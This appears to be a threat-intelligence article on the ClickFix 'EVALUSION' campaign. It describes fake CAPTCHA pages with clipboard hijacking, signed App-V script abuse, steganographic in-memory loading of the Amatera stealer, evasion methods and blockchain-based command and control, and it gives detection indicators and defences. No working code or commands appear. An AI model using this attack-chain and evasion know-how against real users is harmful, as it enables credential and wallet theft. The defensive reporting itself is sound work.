Security researchers have identified an expanding ClickFix attack campaign that combines fake CAPTCHA pages with signed Microsoft Application Virtualization scripts to distribute the Amatera information stealer. The technique has become so prevalent that it now accounts for 47% of attacks observed by Microsoft.
Campaign overview
| Attribute | Details |
|---|
| Campaign name | EVALUSION |
| Tracked by | eSentire |
| Primary payload | Amatera Stealer |
| Secondary payload | NetSupport RAT |
| Delivery method | ClickFix social engineering |
| Prevalence | 47% of observed attacks (Microsoft) |
| First seen | Late 2024 |
| Current status | Active and expanding |
What is ClickFix?
ClickFix is a social engineering technique that manipulates users into executing malicious commands through a deceptive sequence:
Compromised website → Fake CAPTCHA → Clipboard hijack → User runs command → Malware execution
The attack exploits user conditioning around verification prompts—people are accustomed to solving CAPTCHAs and tend to follow instructions without questioning them.
Why ClickFix works
| Factor | Exploitation |
|---|
| CAPTCHA fatigue | Users are conditioned to comply |
| Trust indicators | Professional-looking pages |
| Urgency creation | ”Verify now” messaging |
| Authority appearance | Impersonates legitimate sites |
| Minimal suspicion | No download prompts |
Attack chain breakdown
Stage 1: Initial access
Users visit a compromised or malicious website displaying what appears to be a legitimate verification prompt:
| Lure type | Examples |
|---|
| Fake CAPTCHA | ”Verify you are human” |
| Site impersonation | Booking.com, corporate portals |
| Error message | ”Fix display issue” |
| Verification gate | ”Prove you’re not a bot” |
The pages are professionally designed to match legitimate verification services.
Stage 2: Clipboard hijacking
Behind the fake CAPTCHA, JavaScript silently copies malicious PowerShell code to the victim’s clipboard.
| Technical detail | Implementation |
|---|
| Trigger | User interaction with page |
| Method | JavaScript clipboard API |
| Payload | Encoded PowerShell command |
| Visibility | Hidden from user |
Stage 3: Social engineering
The page instructs users to:
| Step | User action |
|---|
| 1 | Press Win + R to open the Run dialog |
| 2 | Press Ctrl + V to paste |
| 3 | Press Enter to execute |
The instructions may be framed as:
- Completing verification
- Fixing a display issue
- Confirming identity
- Bypassing an error
Stage 4: Payload delivery
The pasted command triggers a multi-stage delivery chain:
| Stage | Action |
|---|
| Initial PowerShell | Downloads payload from C2 |
| Image download | Fetches PNG from CDN |
| Steganography | Extracts data hidden in images via LSB steganography |
| Decryption | Decrypts and decompresses payload (GZip) |
| Memory execution | Runs entirely in memory to evade detection |
| Shellcode | Native shellcode maps and executes Amatera |
Stage 5: Signed script abuse
The campaign leverages Microsoft Application Virtualization (App-V) scripts that are digitally signed by Microsoft. This:
| Benefit | Explanation |
|---|
| Bypasses application whitelisting | Signed by trusted publisher |
| Evades security tools | Trusted certificate |
| Adds false legitimacy | Microsoft signature |
| Reduces detection | Known-good binaries |
Amatera Stealer capabilities
Amatera is an evolution of ACR (AcridRain) Stealer, available as malware-as-a-service (MaaS).
Development history
| Date | Event |
|---|
| Mid-2024 | ACR Stealer sales suspended |
| June 2025 | Amatera first observed |
| 2025-2026 | Active MaaS operations |
Pricing
| Plan | Cost |
|---|
| Monthly | $199 |
| Annual | $1,499 |
Data theft targets
| Category | Targets |
|---|
| Browsers | Passwords, cookies, history, autofill, payment cards |
| Cryptocurrency | Wallet files, seed phrases, private keys |
| Messaging | Discord tokens, Telegram sessions |
| Email | Client credentials, cached emails |
| FTP | FileZilla, WinSCP credentials |
| Gaming | Steam, Epic Games, other platform credentials |
| System | Hardware IDs, installed software, screenshots |
| 2FA | Authenticator app data |
Targeted applications
| Category | Applications |
|---|
| Browsers | Chrome, Firefox, Edge, Brave, Opera |
| Wallets | MetaMask, Exodus, Electrum, Atomic, Coinbase |
| Messaging | Discord, Telegram, Signal |
| Email | Outlook, Thunderbird |
| VPN | NordVPN, ProtonVPN configs |
| Password managers | Browser-stored credentials |
Evasion techniques
Amatera employs advanced detection evasion:
| Technique | Purpose |
|---|
| WoW64 SysCalls | Bypasses user-mode hooking used by EDR |
| In-memory execution | No files written to disk |
| AMSI patching | Disables Windows anti-malware scanning |
| Sandbox detection | Identifies analysis environments |
| Time-based checks | Stalls in sandbox environments |
| Anti-debugging | Detects debugger presence |
Command and control infrastructure
The EVALUSION campaign uses highly resilient C2 leveraging legitimate services:
| Service | Purpose |
|---|
| Google Calendar | Configuration delivery |
| jsDelivr CDN | Payload hosting |
| Binance BNB Smart Chain | Decentralized configuration storage |
| Image hosting | Steganographic payload delivery |
| Telegram | Exfiltration channel |
Blockchain C2 resilience
Using blockchain for configuration makes takedown nearly impossible:
| Factor | Implication |
|---|
| Immutable storage | Data cannot be removed |
| Decentralized | No single point of failure |
| Legitimate service | Cannot be blocked wholesale |
| Censorship resistant | Survives takedown attempts |
Exfiltration endpoints rotate frequently, complicating detection and response.
Detection indicators
Behavioral indicators
| Indicator | Detection value |
|---|
| PowerShell execution from Run dialog | High |
| Clipboard monitoring activity | Medium |
| Connections to Telegram/Discord APIs from unexpected apps | High |
| Access to browser credential stores | High |
| Image downloads followed by unusual memory activity | Medium |
| App-V script execution in unusual context | High |
User-visible signs
| Sign | Risk indication |
|---|
| Unexpected CAPTCHA prompts | Potential ClickFix |
Requests to open Run dialog (Win + R) | Attack in progress |
| Instructions to paste clipboard contents | Malicious payload |
| ”Verification” that doesn’t match site behavior | Compromise |
| Pop-up errors requiring “fixes” | Social engineering |
Network indicators
| Indicator | Meaning |
|---|
| HTTP requests with mismatched Host header/SNI and destination IP | C2 communication |
| Connections to Google Calendar API from unexpected processes | Configuration retrieval |
| jsDelivr requests for suspicious content | Payload delivery |
| Telegram API exfiltration traffic | Data theft |
| BNB Smart Chain API calls | Configuration lookup |
File system indicators
| Artifact | Location |
|---|
| Downloaded PNG files | Temp directories |
| PowerShell transcript logs | If logging enabled |
| Browser data access timestamps | Profile directories |
Defensive recommendations
For organizations
| Control | Implementation |
|---|
| Restrict Run dialog | Group Policy to disable Win + R for standard users |
| PowerShell constraints | Constrained Language Mode, execution policy |
| Remove App-V | Uninstall if not business-required |
| EDR with behavioral detection | Detect clipboard abuse and memory-only execution |
| PowerShell logging | Enable ScriptBlock and Module logging |
| Network monitoring | Alert on C2 infrastructure patterns |
| Application whitelisting | Block unsigned scripts |
Group Policy recommendations
| Setting | Configuration |
|---|
| Disable Run command | User Configuration → Administrative Templates → Start Menu |
| PowerShell execution policy | AllSigned or Restricted |
| Script Block Logging | Enable in PowerShell policies |
| Module Logging | Enable in PowerShell policies |
For users
| Action | Rationale |
|---|
| Never paste commands you don’t understand | Core defense |
| Be suspicious of unusual verification requests | Recognition |
| Verify website legitimacy | URL inspection |
| Use dedicated password manager | Not browser storage |
| Enable MFA on all accounts | Reduce stolen credential impact |
| Report suspicious websites | Organizational awareness |
For security awareness training
Include ClickFix in phishing simulations:
| Scenario | Training value |
|---|
| Fake CAPTCHA | Recognition training |
| Run dialog abuse attempts | Procedure awareness |
| ”Paste and run” requests | Risk understanding |
| Impersonated verification | Brand awareness |
ClickFix has been adopted by multiple threat actors:
| Actor | Campaign | Target |
|---|
| Various criminals | EVALUSION | General population |
| APT groups | Targeted campaigns | Specific organizations |
| MaaS operators | Multiple | Broad targeting |
Context
ClickFix represents a shift in attack methodology—rather than exploiting software vulnerabilities, it exploits human conditioning around verification prompts. Users are trained to expect and comply with CAPTCHAs, making the social engineering highly effective.
| Evolution | Implication |
|---|
| From malware exploits | To social engineering |
| From file downloads | To clipboard abuse |
| From untrusted code | To signed Microsoft binaries |
| From detectable payloads | To memory-only execution |
The technique’s prevalence (47% of observed attacks) indicates it works. Combined with sophisticated evasion techniques and resilient infrastructure, campaigns like EVALUSION pose significant risk to organizations and individuals.
Defense requires both technical controls (restricting Run dialog, PowerShell constraints) and user education (recognizing unusual verification requests). Neither alone is sufficient against well-crafted social engineering.
The use of blockchain for C2 configuration represents an emerging challenge—attackers are building infrastructure that cannot be taken down through traditional means, requiring defenders to focus on detection and user awareness rather than infrastructure disruption.
